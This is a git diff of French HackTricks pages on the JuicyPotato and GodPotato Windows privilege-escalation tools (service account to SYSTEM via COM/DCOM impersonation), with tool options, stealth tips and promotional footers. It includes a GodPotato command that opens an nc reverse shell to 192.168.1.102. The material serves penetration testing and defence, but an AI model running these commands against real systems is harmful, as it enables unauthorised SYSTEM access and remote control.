_Une version sucrée de_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, avec un peu de jus, c'est-à-dire **un autre outil d'escalade de privilèges locaux, des comptes de service Windows à NT AUTHORITY\SYSTEM**_
_Une version sucrée de_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, avec un peu de jus, c'est-à-dire **un autre outil d'élévation de privilèges locaux, des comptes de service Windows à NT AUTHORITY\SYSTEM**_
#### Vous pouvez télécharger JuicyPotato depuis [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
### Résumé <a href="#summary" id="summary"></a>
[**Depuis le Readme de juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[**À partir de la documentation de juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) et ses [variantes](https://github.com/decoder-it/lonelypotato) exploitent la chaîne d'escalade de privilèges basée sur le service [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) ayant l'écouteur MiTM sur `127.0.0.1:6666` et lorsque vous avez les privilèges `SeImpersonate` ou `SeAssignPrimaryToken`. Lors d'une révision de la construction Windows, nous avons trouvé une configuration où `BITS` était intentionnellement désactivé et le port `6666` était utilisé.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) et ses [variantes](https://github.com/decoder-it/lonelypotato) exploitent la chaîne d'élévation de privilèges basée sur le service [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) ayant l'écouteur MiTM sur `127.0.0.1:6666` et lorsque vous avez les privilèges `SeImpersonate` ou `SeAssignPrimaryToken`. Lors d'une révision de la construction Windows, nous avons trouvé une configuration où `BITS` était intentionnellement désactivé et le port `6666` était utilisé.
Nous avons décidé de rendre [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) opérationnel : **Dites bonjour à Juicy Potato**.
> Pour la théorie, voir [Rotten Potato - Escalade de privilèges des comptes de service à SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) et suivre la chaîne de liens et de références.
> Pour la théorie, voir [Rotten Potato - Élévation de privilèges des comptes de service à SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) et suivez la chaîne de liens et de références.
Nous avons découvert qu'en dehors de `BITS`, il existe plusieurs serveurs COM que nous pouvons exploiter. Ils doivent simplement :
@ -71,8 +71,8 @@ JuicyPotato vous permet de :
* `les deux`
* **Processus à lancer** _lancer un exécutable ou un script si l'exploitation réussit_
* **Argument du processus** _personnalisez les arguments du processus lancé_
* **Adresse du serveur RPC** _pour une approche furtive, vous pouvez vous authentifier auprès d'un serveur RPC externe_
* **Port du serveur RPC** _utile si vous voulez vous authentifier auprès d'un serveur externe et que le pare-feu bloque le port `135`..._
* **Adresse du serveur RPC** _pour une approche furtive, vous pouvez vous authentifier à un serveur RPC externe_
* **Port du serveur RPC** _utile si vous voulez vous authentifier à un serveur externe et que le pare-feu bloque le port `135`..._
* **Mode TEST** _principalement à des fins de test, c'est-à-dire tester les CLSID. Il crée le DCOM et affiche l'utilisateur du jeton. Voir_ [_ici pour les tests_](http://ohpe.it/juicy-potato/Test/)
### Utilisation <a href="#usage" id="usage"></a>
```
@ -93,15 +93,15 @@ Optional args:
```
### Réflexions finales <a href="#final-thoughts" id="final-thoughts"></a>
[**À partir de la documentation de juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
[**À partir de la documentation de Juicy Potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
Si l'utilisateur a les privilèges `SeImpersonate` ou `SeAssignPrimaryToken`, alors vous êtes **SYSTEM**.
Il est presque impossible d'empêcher l'abus de tous ces serveurs COM. Vous pourriez envisager de modifier les autorisations de ces objets via `DCOMCNFG`, mais bonne chance, cela va être difficile.
La solution réelle consiste à protéger les comptes sensibles et les applications qui s'exécutent sous les comptes `* SERVICE`. Arrêter `DCOM` inhiberait certainement cette exploitation mais pourrait avoir un impact sérieux sur le système d'exploitation sous-jacent.
La solution réelle consiste à protéger les comptes sensibles et les applications qui s'exécutent sous les comptes `* SERVICE`. Arrêter `DCOM` inhiberait certainement cette exploitation, mais pourrait avoir un impact sérieux sur le système d'exploitation sous-jacent.
De : [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
À partir de : [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
## Exemples
@ -148,15 +148,15 @@ Ensuite, téléchargez [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/b
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site Web et essayer leur moteur gratuitement sur :
{% embed url="https://whiteintel.io" %}
@ -167,7 +167,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -79,8 +79,6 @@ C:\temp>type C:\temp\w.log
nt authority\system
```
### GodPotato
### Pomme de Dieu
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
@ -92,9 +90,9 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.